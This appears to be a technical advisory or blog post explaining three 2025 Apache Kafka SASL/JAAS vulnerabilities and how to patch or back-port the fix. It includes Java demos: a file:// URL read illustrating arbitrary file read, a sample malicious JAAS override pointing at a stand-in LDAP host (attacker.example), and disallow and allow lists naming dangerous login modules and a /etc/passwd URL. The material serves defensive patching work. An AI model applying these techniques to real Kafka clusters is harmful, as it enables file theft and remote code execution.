Over the past week, R&D has received repeated requests from field staff at several government-sector sites to analyze and patch the recently disclosed high-severity Kafka vulnerabilities. Checking Openwall and the CVE database, I confirmed that three high-severity Kafka vulnerabilities were indeed published on 2025-06-09:
CVE-2025-27817: Apache Kafka Client: Arbitrary file read and SSRF vulnerability (Luke Chen)
CVE-2025-27818: Apache Kafka: Possible RCE attack via SASL JAAS LdapLoginModule configuration (Luke Chen)
CVE-2025-27819: Apache Kafka: Possible RCE/Denial of service attack via SASL JAAS JndiLoginModule configuration (Luke Chen)
CVE-2025-27817
Affected versions: 3.1.0-3.9.0
Fix: see the <<Patch Fix>> section below
Advisory: https://www.cve.org/CVERecord?id=CVE-2025-27817
Description:
A possible arbitrary file read and SSRF vulnerability has been identified in Apache Kafka Client. Apache Kafka Clients accept configuration data for setting the SASL/OAUTHBEARER connection with the brokers, including "sasl.oauthbearer.token.endpoint.url" and "sasl.oauthbearer.jwks.endpoint.url". Apache Kafka allows clients to read an arbitrary file and return the content in the error log, or send requests to an unintended location. In applications where Apache Kafka Clients configurations can be specified by an untrusted party, attackers may use the "sasl.oauthbearer.token.endpoint.url" and "sasl.oauthbearer.jwks.endpoint.url" configurations to read arbitrary contents of the disk and environment variables or make requests to an unintended location. In particular, this flaw may be used in Apache Kafka Connect to escalate from REST API access to filesystem/environment/URL access, which may be undesirable in certain environments, including SaaS products. Since Apache Kafka 3.9.1/4.0.0, we have added a system property ("-Dorg.apache.kafka.sasl.oauthbearer.allowed.urls") to set the allowed URLs in SASL JAAS configuration. In 3.9.1, it accepts all URLs by default for backward compatibility. However, in 4.0.0 and newer, the default value is an empty list and users have to set the allowed URLs explicitly.
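To see why an attacker-controlled endpoint URL is dangerous, here is a minimal, self-contained Java sketch (this is demo code, not Kafka source; the class and method names are made up). It shows that `java.net.URL` happily dereferences `file://` URLs, so pointing a "token endpoint" at a local path turns the token fetch into an arbitrary file read:

```java
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.URL;
import java.nio.file.Files;
import java.nio.file.Path;

// Hypothetical demo: fetch whatever an "endpoint URL" points at.
// With file:// this reads local files -- the core of CVE-2025-27817.
public class FileUrlRead {
    public static String fetch(String endpointUrl) throws IOException {
        try (BufferedReader r = new BufferedReader(
                new InputStreamReader(new URL(endpointUrl).openStream()))) {
            StringBuilder sb = new StringBuilder();
            String line;
            while ((line = r.readLine()) != null) sb.append(line);
            return sb.toString();
        }
    }

    public static void main(String[] args) throws IOException {
        // Simulate a sensitive local file on disk.
        Path secret = Files.createTempFile("secret", ".txt");
        Files.writeString(secret, "db-password=hunter2");
        // An attacker supplies file:///... instead of https://...
        System.out.println(fetch(secret.toUri().toString()));
    }
}
```

The allow-list system property described above exists precisely to stop such non-HTTPS, attacker-chosen URLs from ever being dereferenced.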
CVE-2025-27818
Affected versions: 2.3.0-3.9.0
Fix: see the <<Patch Fix>> section below
Advisory: https://www.cve.org/CVERecord?id=CVE-2025-27818
Description:
A possible security vulnerability has been identified in Apache Kafka. This requires alterConfig access to the cluster resource, or access to a Kafka Connect worker, and the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol, which has been possible on Kafka clusters since Apache Kafka 2.0.0 (Kafka Connect 2.3.0). When configuring the broker via config file or AlterConfig command, or a connector via the Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config` property for any of the connector's Kafka clients to "com.sun.security.auth.module.LdapLoginModule", which can be done via the `producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties. This will allow the server to connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can use to execute Java deserialization gadget chains on the Kafka Connect server. An attacker can cause unrestricted deserialization of untrusted data, or RCE, when there are gadgets in the classpath.
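The defensive idea behind the fix can be sketched as follows (an illustrative guard, not Kafka source; `JaasOverrideGuard` and its method names are hypothetical): reject any submitted JAAS override that references a known-dangerous login module before the connector config is accepted:

```java
import java.util.Set;

// Hypothetical sketch of a disallow-list check for JAAS overrides,
// mirroring the spirit of the Kafka fix (names are illustrative).
public class JaasOverrideGuard {
    static final Set<String> DISALLOWED = Set.of(
        "com.sun.security.auth.module.JndiLoginModule",
        "com.sun.security.auth.module.LdapLoginModule");

    /** Returns true if the JAAS config references a disallowed login module. */
    public static boolean isDisallowed(String jaasConfig) {
        for (String module : DISALLOWED) {
            if (jaasConfig.contains(module)) return true;
        }
        return false;
    }

    public static void main(String[] args) {
        // The shape of what an attacker would submit via the Connect REST API:
        String malicious = "producer.override.sasl.jaas.config="
            + "com.sun.security.auth.module.LdapLoginModule required "
            + "userProvider=\"ldap://attacker.example:1389/o=evil\";";
        System.out.println(isDisallowed(malicious)); // prints true
    }
}
```

A real deployment should rely on the official system property rather than a home-grown check, but this captures the mechanism: the attack stands or falls on whether `LdapLoginModule` can appear in a client override at all.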
CVE-2025-27819
Affected versions: 2.0.0-3.3.2
Fix: see the <<Patch Fix>> section below
Advisory: https://www.cve.org/CVERecord?id=CVE-2025-27819
Description:
In CVE-2023-25194, we announced the RCE/Denial of service attack via SASL JAAS JndiLoginModule configuration in the Kafka Connect API. But the Kafka Connect API is not the only component vulnerable to this attack; Apache Kafka brokers have the same vulnerability. To exploit this vulnerability, the attacker needs to be able to connect to the Kafka cluster and have the AlterConfigs permission on the cluster resource. Since Apache Kafka 3.4.0, we have added a system property ("-Dorg.apache.kafka.disallowed.login.modules") to disable the problematic login modules usage in SASL JAAS configuration. Also, by default "com.sun.security.auth.module.JndiLoginModule" is disabled in Apache Kafka 3.4.0, and "com.sun.security.auth.module.JndiLoginModule,com.sun.security.auth.module.LdapLoginModule" is disabled by default in Apache Kafka 3.9.1/4.0.0.
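The disallow list above is just a comma-separated JVM property. A minimal sketch of how such a property value would be parsed into a set of blocked module names (illustrative code, not the committed Kafka implementation):

```java
import java.util.HashSet;
import java.util.Set;

// Hypothetical parser for a comma-separated disallow list, e.g. the value
// passed via -Dorg.apache.kafka.disallowed.login.modules (sketch only).
public class DisallowedModules {
    public static Set<String> parse(String propertyValue) {
        Set<String> out = new HashSet<>();
        if (propertyValue == null) return out;
        for (String m : propertyValue.split(",")) {
            String trimmed = m.trim();
            if (!trimmed.isEmpty()) out.add(trimmed);
        }
        return out;
    }

    public static void main(String[] args) {
        // The 3.9.1/4.0.0 default described above: both modules blocked.
        Set<String> disallowed = parse(
            "com.sun.security.auth.module.JndiLoginModule,"
            + "com.sun.security.auth.module.LdapLoginModule");
        System.out.println(disallowed.contains(
            "com.sun.security.auth.module.JndiLoginModule")); // prints true
    }
}
```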
Readers who study the three descriptions carefully will notice that they are really one and the same issue: SASL JAAS security configuration. The remediation is therefore identical for all three. If the site permits, upgrade Kafka to 3.9.1 or 4.0.0, where the issue is fixed. In practice, however, sites rarely allow ad-hoc upgrades, especially when the version jump is large (e.g. crossing from ZooKeeper mode to KRaft mode); customers generally refuse to approve them.
I compared the code between versions 2.0 and 4.0 and found that the fix is quite self-contained, with no coupling to other modules. If you need the fix, you can back-port the change into the source of your own Kafka version, rebuild, and replace kafka-clients-x.x.x.jar. In essence, it just adds a configuration option that blocks specific JAAS content from reaching Kafka. The complete upstream change is here:
https://github.com/apache/kafka/commit/1ed61e4090353bc9e4802ee09366f512dc60884f
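The shape of that fix, as the descriptions above explain it, is an allow list for OAUTHBEARER endpoint URLs: in 3.9.1 an unset list accepts everything for backward compatibility, while in 4.0.0 the default is an empty list that rejects everything. A hedged sketch of that semantics (illustrative code; `AllowedUrls` is not the actual committed class):

```java
import java.util.HashSet;
import java.util.Set;

// Hypothetical sketch of the allow-list semantics added in 3.9.1/4.0.0
// for -Dorg.apache.kafka.sasl.oauthbearer.allowed.urls (not Kafka source).
public class AllowedUrls {
    private final Set<String> allowed = new HashSet<>();

    public AllowedUrls(String commaSeparated) {
        for (String u : commaSeparated.split(",")) {
            String trimmed = u.trim();
            if (!trimmed.isEmpty()) allowed.add(trimmed);
        }
    }

    /** With an empty list (the 4.0.0 default) every URL is rejected. */
    public boolean isAllowed(String url) {
        return allowed.contains(url);
    }

    public static void main(String[] args) {
        AllowedUrls a = new AllowedUrls("https://idp.example.com/token");
        System.out.println(a.isAllowed("https://idp.example.com/token")); // true
        System.out.println(a.isAllowed("file:///etc/passwd"));           // false
    }
}
```

If you back-port the upstream commit instead of writing your own check, you get exactly this behavior without maintaining custom code.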